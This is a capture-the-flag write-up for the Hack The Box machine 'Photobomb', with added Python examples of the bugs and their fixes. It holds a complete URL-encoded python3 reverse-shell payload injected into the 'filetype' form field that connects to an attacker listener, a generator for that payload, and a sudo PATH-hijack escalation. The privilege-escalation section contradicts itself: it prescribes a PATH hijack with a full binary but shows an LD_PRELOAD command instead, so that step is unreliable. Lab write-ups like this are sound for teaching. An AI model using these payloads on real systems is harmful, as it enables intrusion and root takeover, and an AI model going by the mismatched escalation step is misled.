Photobomb - HTB - Key Points
October 14, 2022
Target's IP: 10.10.11.182

```
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
```
Trying to reach the web server by IP reveals an important piece of information: it redirects to a virtual host name, so the first attempt fails with

```
Unknown host: photobomb.htb
```

Add `10.10.11.182 photobomb.htb` to /etc/hosts before going any further.
Every request to the web server then returns 401 Unauthorized (HTTP Basic auth), but in the browser's developer tools we see that the page includes a JavaScript file that contains sensitive information:
```javascript
function init() {
  // Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me
  if (document.cookie.match(/.*;?\s*isPhotoBombTechSupport\s*=\s*[^;]+(.*)?$/)) {
    document.getElementsByClassName('creds')[0].setAttribute('href','http://pH0t0:b0Mb!@photobomb.htb/printer');
  }
}
```
We can use these credentials (pH0t0:b0Mb!) to authenticate to the web server, and also pass them to tools like gobuster to brute-force directories and look for hidden content.
Nothing else turns up; the only page available lets us download images from the server. Intercepting the request, we see it is a POST with three parameters, so let's try injecting into each one of them.

The second one, filetype, is vulnerable to command injection, so we can use it to launch a reverse shell. This is a classic Python reverse shell, URL-encoded because it has to be submitted in the form body (replace <IP ADDRESS> with your listener's address and have a listener on port 9988 running first):

```
photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg;python3%20-c%20'import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22<IP ADDRESS>%22,9988));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22/bin/sh%22)'&dimensions=3000x2000
```
This way we get a shell on the box as user wizard.
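As an added example (not code from the box or from the original post), the block below shows the shape of the bug behind the filetype injection and the fix a developer would want. `vulnerable_convert` is a hypothetical stand-in for the server's download handler: it interpolates the three POST parameters straight into a shell command, which is exactly what the `;` in the payload relies on; `echo` replaces the real image tool so it runs anywhere. `hardened_convert` applies allow-lists and passes an argv list instead of a shell string. `build_reverse_shell_body` form-encodes the page's python3 reverse shell the way a proxy would, and `decoded_filetype` shows what the server's form parser hands to the handler. The sample file name and dimensions are the ones from the page; the listener address is a placeholder.

```python
"""Added example (not the box's code): filetype command injection and its fix."""
import re
import subprocess
from urllib.parse import parse_qs, quote

# Constructed sample request; the attacker only touches filetype.
SAMPLE_PHOTO = "voicu-apostol-MWER49YaD-M-unsplash.jpg"
SAMPLE_DIMENSIONS = "3000x2000"
INJECTED_FILETYPE = "jpg;echo INJECTED"   # harmless stand-in for the reverse shell


def vulnerable_convert(photo: str, filetype: str, dimensions: str) -> str:
    """Hypothetical vulnerable handler: f-string interpolated into shell=True.

    The ';' in filetype terminates the intended command, so whatever follows
    runs as a second command with the web server's privileges.
    """
    cmd = f"echo convert {photo} -resize {dimensions} /tmp/out.{filetype}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


FILETYPE_RE = re.compile(r"(jpg|png)")
DIMENSIONS_RE = re.compile(r"\d{1,5}x\d{1,5}")
PHOTO_RE = re.compile(r"[A-Za-z0-9._-]+\.(jpg|png)")


def is_safe_request(photo: str, filetype: str, dimensions: str) -> bool:
    """Allow-list every parameter; anything carrying shell metacharacters fails."""
    return bool(
        PHOTO_RE.fullmatch(photo)
        and FILETYPE_RE.fullmatch(filetype)
        and DIMENSIONS_RE.fullmatch(dimensions)
    )


def hardened_convert(photo: str, filetype: str, dimensions: str) -> str:
    """Same operation without a shell: argv list, so metacharacters are just bytes."""
    if not is_safe_request(photo, filetype, dimensions):
        raise ValueError("rejected request parameters")
    argv = ["echo", "convert", photo, "-resize", dimensions, f"/tmp/out.{filetype}"]
    return subprocess.run(argv, capture_output=True, text=True).stdout


def build_reverse_shell_body(lhost: str, lport: int) -> str:
    """Form-encode the page's python3 reverse shell into the filetype field.

    quote(safe="") percent-encodes spaces, quotes, ';' and '&' so the body
    survives the form parser intact; the server decodes it before the shell
    ever sees it.
    """
    shell = (
        "python3 -c 'import socket,subprocess,os;"
        "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
        f's.connect(("{lhost}",{lport}));'
        "os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);"
        "import pty;pty.spawn(\"/bin/sh\")'"
    )
    return (
        f"photo={quote(SAMPLE_PHOTO, safe='')}"
        f"&filetype={quote('jpg;' + shell, safe='')}"
        f"&dimensions={quote(SAMPLE_DIMENSIONS, safe='')}"
    )


def decoded_filetype(body: str) -> str:
    """What the server's form parser hands to the handler."""
    return parse_qs(body)["filetype"][0]


if __name__ == "__main__":
    # Local, harmless demonstration: the injected echo runs in the vulnerable path only.
    print(vulnerable_convert(SAMPLE_PHOTO, INJECTED_FILETYPE, SAMPLE_DIMENSIONS))
    print(is_safe_request(SAMPLE_PHOTO, INJECTED_FILETYPE, SAMPLE_DIMENSIONS))
    print(decoded_filetype(build_reverse_shell_body("10.10.14.5", 9988)))
```

The allow-list is the part that matters: validating `filetype` against the handful of extensions the page actually offers would have stopped the injection even if the shell string had stayed.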
During basic enumeration we see that wizard can run /opt/cleanup.sh as root with sudo, and the SETENV tag means environment variables passed on the sudo command line are kept (they are not subject to env_reset or env_delete). The script also calls the find binary without its full path, so we can follow this guide to exploit it, although instead of building a shared object with -shared, generate a full binary called find. Since SETENV also lets PATH itself be set on the sudo command line despite secure_path, `sudo PATH=/home/wizard:$PATH /opt/cleanup.sh` is the direct way to make that relative find resolve to ours.
```
wizard@photobomb:~$ sudo -l
Matching Defaults entries for wizard on photobomb:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh
wizard@photobomb:~$ sudo LD_PRELOAD=/home/wizard/find /opt/cleanup.sh
root@photobomb:/home/wizard# cat user.txt
85...49
root@photobomb:/home/wizard# cat /root/root.txt
88...34
```
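As an added example (not the box's /opt/cleanup.sh, whose contents the page does not show), the block below reproduces the privilege escalation mechanism locally: a script that calls `find` by bare name resolves it through PATH at run time, so whoever controls PATH controls what runs. Everything lives in a throwaway directory containing a hypothetical stand-in cleanup.sh and a planted `find`; the script runs once with the normal PATH and once with the lab directory prepended, which is what `sudo PATH=/home/wizard:$PATH /opt/cleanup.sh` does on the box thanks to SETENV. No root is needed to watch the resolution flip.

```python
"""Added example (not the box's script): PATH hijack of an unqualified `find`."""
import os
import shutil
import subprocess
import tempfile
from typing import Optional

STANDIN_CLEANUP = """#!/bin/sh
# Hypothetical stand-in for /opt/cleanup.sh: 'find' is not an absolute path,
# so the shell looks it up in PATH when the script runs.
find "$1" -maxdepth 0 -type d
"""

PLANTED_FIND = """#!/bin/sh
# Attacker-controlled 'find'. On the box this is where the root shell
# (or a setuid copy of bash) would be spawned instead of an echo.
echo "HIJACKED: find ran as uid $(id -u) with args: $*"
"""


def make_lab():
    """Create the lab directory holding cleanup.sh and the planted find."""
    lab = tempfile.mkdtemp(prefix="photobomb-lab-")
    for name, body in (("cleanup.sh", STANDIN_CLEANUP), ("find", PLANTED_FIND)):
        path = os.path.join(lab, name)
        with open(path, "w") as fh:
            fh.write(body)
        os.chmod(path, 0o755)
    return lab, os.path.join(lab, "cleanup.sh")


def run_cleanup(script: str, path_prefix: Optional[str] = None) -> str:
    """Run the script; optionally prepend a directory to PATH, as sudo SETENV permits."""
    env = dict(os.environ)
    if path_prefix is not None:
        env["PATH"] = path_prefix + os.pathsep + env.get("PATH", "/usr/bin:/bin")
    proc = subprocess.run(
        ["/bin/sh", script, tempfile.gettempdir()],
        env=env, capture_output=True, text=True,
    )
    return proc.stdout


def demo() -> dict:
    """Run the stand-in script with the normal PATH and with the hijacked PATH."""
    lab, script = make_lab()
    try:
        return {
            "normal": run_cleanup(script),
            "hijacked": run_cleanup(script, path_prefix=lab),
        }
    finally:
        shutil.rmtree(lab)


if __name__ == "__main__":
    for mode, out in demo().items():
        print(f"[{mode}] {out.strip()}")
```

The fix on the defender's side is the mirror image of the attack: call `/usr/bin/find` by absolute path (or reset PATH at the top of the script) and do not grant SETENV on a sudo rule unless the target command really needs caller-supplied environment.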
Box done, merry hacking ;)